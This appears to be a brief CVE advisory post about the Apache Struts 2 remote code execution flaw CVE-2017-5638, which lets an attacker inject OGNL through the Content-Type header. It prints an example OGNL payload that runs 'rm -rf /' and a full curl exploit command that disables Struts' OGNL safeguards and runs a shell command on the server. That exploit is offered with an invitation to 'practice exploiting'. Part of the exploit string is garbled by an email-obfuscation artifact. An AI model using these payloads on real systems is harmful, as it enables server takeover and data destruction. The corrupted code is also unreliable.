Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent with a file upload request, the framework incorrectly processes it. Specifically, if the header contains an OGNL (Object-Graph Navigation Language) expression encapsulated with `%{` and }, the parser attempts to evaluate this expression while generating the error message. This evaluation occurs due to the exception message being directly incorporated into the broader error response without proper sanitization. Since OGNL expressions can execute arbitrary Java code on the server, an attacker can craft a request with a malicious `Content-Type` value like %{(_='multipart/form-data').(_memberAccess['allowStaticMethodAccess']=true).(@java.lang.Runtime@getRuntime().exec('rm -rf /'))}. This bypasses security controls and allows the attacker to achieve remote code execution with the privileges of the Struts application server, fundamentally compromising the host.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: 2017-03-10

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target/upload.action`

How Exploit:

Craft malicious Content-Type header containing OGNL expression for RCE.

Protection from this CVE:

Upgrade to Struts 2.3.32 or 2.5.10.1. Implement WAF rules.

Impact:

Full server compromise. Arbitrary command execution.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top